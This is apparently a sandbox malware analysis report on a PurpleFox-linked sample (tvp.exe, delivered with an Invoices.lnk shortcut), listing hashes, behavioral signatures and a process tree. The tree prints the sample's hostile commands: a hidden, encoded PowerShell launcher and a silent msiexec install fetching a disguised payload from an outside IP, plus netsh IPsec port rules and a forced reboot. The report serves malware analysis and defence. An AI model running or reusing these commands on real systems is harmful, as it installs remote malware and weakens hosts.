Analysis
-
max time kernel
106s -
max time network
108s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
10-07-2023 23:57
Static task
static1
Behavioral task
behavioral1
Sample
Invoices.lnk
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
Invoices.lnk
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
Res/TVPSkin.dll
Resource
win7-20230705-en
Behavioral task
behavioral4
Sample
Res/TVPSkin.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
Res/hskin.dll
Resource
win7-20230703-en
Behavioral task
behavioral6
Sample
Res/hskin.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
Res/tvp.exe
Resource
win7-20230703-en
Behavioral task
behavioral8
Sample
Res/tvp.exe
Resource
win10v2004-20230703-en
General
-
Target
Res/tvp.exe
-
Size
228KB
-
MD5
de2052aae5a5915d09d9d1ede714865c
-
SHA1
2161a471b598ea002fc2a1cc4b65dbb8da14a88e
-
SHA256
1d3f51b33070b5b8f11c891bb160f5f737151f3a36c2e24f96c2844b089a5294
-
SHA512
914eb403bc0662266e9b00f52da192463ae782c301be5279579fe88924451fa8b38a9cc9e689499ae7240259e7c03310980f06a5f7cd1b90bda0b3948fb5d1b3
-
SSDEEP
3072:0QUurm/I/Pc1fsrHxbGL+9QD2pkIanLqf0bAadkp2guonxKzjMMDE0BB6p2wkLqj:lRrXECWDianeuonmRankL
Malware Config
Signatures
-
Processes:
resource yara_rule C:\Windows\Installer\MSI7012.tmp purplefox_msi -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 3 2628 msiexec.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 4 IoCs
Processes:
MsiExec.exepid process 2660 MsiExec.exe 2660 MsiExec.exe 2660 MsiExec.exe 2660 MsiExec.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 1092 takeown.exe 2176 takeown.exe 908 takeown.exe 2592 takeown.exe 2556 takeown.exe 1532 takeown.exe -
Use of msiexec (install) with remote resource 3 IoCs
Processes:
msiexec.exemsiexec.exemsiexec.exepid process 3048 msiexec.exe 2860 msiexec.exe 684 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 11 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI7B78.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7E87.tmp msiexec.exe File created C:\Windows\dbcode86mk.log msiexec.exe File opened for modification C:\Windows\Installer\6d7feb.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI7012.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C73.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7DEA.tmp msiexec.exe File created C:\Windows\Installer\6d7feb.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI8388.tmp msiexec.exe File created C:\Windows\.xml msiexec.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 2332 sc.exe 2192 sc.exe -
Modifies data under HKEY_USERS 44 IoCs
Processes:
netsh.exenetsh.exenetsh.exemsiexec.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepowershell.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7080735a8ab3d901 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad msiexec.exe -
Modifies registry class 10 IoCs
Processes:
tvp.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open tvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1" tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open tvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1" tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command tvp.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
PowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exepowershell.exepid process 1156 PowerShell.exe 1156 PowerShell.exe 1156 PowerShell.exe 1156 PowerShell.exe 1156 PowerShell.exe 1156 PowerShell.exe 2292 powershell.exe 2264 powershell.exe 1460 powershell.exe 2628 msiexec.exe 2628 msiexec.exe 268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
PowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1156 PowerShell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeShutdownPrivilege 2860 msiexec.exe Token: SeShutdownPrivilege 3048 msiexec.exe Token: SeIncreaseQuotaPrivilege 2860 msiexec.exe Token: SeIncreaseQuotaPrivilege 3048 msiexec.exe Token: SeShutdownPrivilege 684 msiexec.exe Token: SeIncreaseQuotaPrivilege 684 msiexec.exe Token: SeRestorePrivilege 2628 msiexec.exe Token: SeTakeOwnershipPrivilege 2628 msiexec.exe Token: SeSecurityPrivilege 2628 msiexec.exe Token: SeCreateTokenPrivilege 2860 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2860 msiexec.exe Token: SeLockMemoryPrivilege 2860 msiexec.exe Token: SeIncreaseQuotaPrivilege 2860 msiexec.exe Token: SeMachineAccountPrivilege 2860 msiexec.exe Token: SeTcbPrivilege 2860 msiexec.exe Token: SeSecurityPrivilege 2860 msiexec.exe Token: SeTakeOwnershipPrivilege 2860 msiexec.exe Token: SeLoadDriverPrivilege 2860 msiexec.exe Token: SeSystemProfilePrivilege 2860 msiexec.exe Token: SeSystemtimePrivilege 2860 msiexec.exe Token: SeProfSingleProcessPrivilege 2860 msiexec.exe Token: SeIncBasePriorityPrivilege 2860 msiexec.exe Token: SeCreatePagefilePrivilege 2860 msiexec.exe Token: SeCreatePermanentPrivilege 2860 msiexec.exe Token: SeBackupPrivilege 2860 msiexec.exe Token: SeRestorePrivilege 2860 msiexec.exe Token: SeShutdownPrivilege 2860 msiexec.exe Token: SeDebugPrivilege 2860 msiexec.exe Token: SeAuditPrivilege 2860 msiexec.exe Token: SeSystemEnvironmentPrivilege 2860 msiexec.exe Token: SeChangeNotifyPrivilege 2860 msiexec.exe Token: SeRemoteShutdownPrivilege 2860 msiexec.exe Token: SeUndockPrivilege 2860 msiexec.exe Token: SeSyncAgentPrivilege 2860 msiexec.exe Token: SeEnableDelegationPrivilege 2860 msiexec.exe Token: SeManageVolumePrivilege 2860 msiexec.exe Token: SeImpersonatePrivilege 2860 msiexec.exe Token: SeCreateGlobalPrivilege 2860 msiexec.exe Token: SeCreateTokenPrivilege 684 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 684 msiexec.exe Token: SeLockMemoryPrivilege 684 msiexec.exe Token: SeIncreaseQuotaPrivilege 684 msiexec.exe Token: SeMachineAccountPrivilege 684 msiexec.exe Token: SeTcbPrivilege 684 msiexec.exe Token: SeSecurityPrivilege 684 msiexec.exe Token: SeTakeOwnershipPrivilege 684 msiexec.exe Token: SeLoadDriverPrivilege 684 msiexec.exe Token: SeSystemProfilePrivilege 684 msiexec.exe Token: SeSystemtimePrivilege 684 msiexec.exe Token: SeProfSingleProcessPrivilege 684 msiexec.exe Token: SeIncBasePriorityPrivilege 684 msiexec.exe Token: SeCreatePagefilePrivilege 684 msiexec.exe Token: SeCreatePermanentPrivilege 684 msiexec.exe Token: SeBackupPrivilege 684 msiexec.exe Token: SeRestorePrivilege 684 msiexec.exe Token: SeShutdownPrivilege 684 msiexec.exe Token: SeDebugPrivilege 684 msiexec.exe Token: SeAuditPrivilege 684 msiexec.exe Token: SeSystemEnvironmentPrivilege 684 msiexec.exe Token: SeChangeNotifyPrivilege 684 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
tvp.exepid process 1628 tvp.exe 1628 tvp.exe 1628 tvp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tvp.exePowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exeMsiExec.exedescription pid process target process PID 1628 wrote to memory of 1156 1628 tvp.exe PowerShell.exe PID 1628 wrote to memory of 1156 1628 tvp.exe PowerShell.exe PID 1628 wrote to memory of 1156 1628 tvp.exe PowerShell.exe PID 1628 wrote to memory of 1156 1628 tvp.exe PowerShell.exe PID 1156 wrote to memory of 2292 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2292 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2292 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2292 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2264 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2264 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2264 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 2264 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 1460 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 1460 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 1460 1156 PowerShell.exe powershell.exe PID 1156 wrote to memory of 1460 1156 PowerShell.exe powershell.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2292 wrote to memory of 3048 2292 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 2264 wrote to memory of 2860 2264 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 1460 wrote to memory of 684 1460 powershell.exe msiexec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2660 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2628 wrote to memory of 2936 2628 msiexec.exe MsiExec.exe PID 2936 wrote to memory of 2480 2936 MsiExec.exe powercfg.exe PID 2936 wrote to memory of 2480 2936 MsiExec.exe powercfg.exe PID 2936 wrote to memory of 2480 2936 MsiExec.exe powercfg.exe PID 2936 wrote to memory of 2480 2936 MsiExec.exe powercfg.exe PID 2936 wrote to memory of 268 2936 MsiExec.exe powershell.exe PID 2936 wrote to memory of 268 2936 MsiExec.exe powershell.exe PID 2936 wrote to memory of 268 2936 MsiExec.exe powershell.exe PID 2936 wrote to memory of 268 2936 MsiExec.exe powershell.exe PID 2936 wrote to memory of 2040 2936 MsiExec.exe netsh.exe PID 2936 wrote to memory of 2040 2936 MsiExec.exe netsh.exe PID 2936 wrote to memory of 2040 2936 MsiExec.exe netsh.exe PID 2936 wrote to memory of 2040 2936 MsiExec.exe netsh.exe PID 2936 wrote to memory of 2176 2936 MsiExec.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exePowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvADEAOAA1AC4AMgAzADcALgAyADEAOAAuADUAMwA6ADgAMAA4ADEALwBzAGUAdAB1AHAALgBqAHAAZwAgAC8AcQAnAA0ACgB9AA0ACgA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 47C45733C16EE9D4710F4DD938D326E12⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 53B2B29BDFB7C052B61281A30B185E85 M Global\MSI00002⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\powercfg.exe"C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter13⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP3⤵
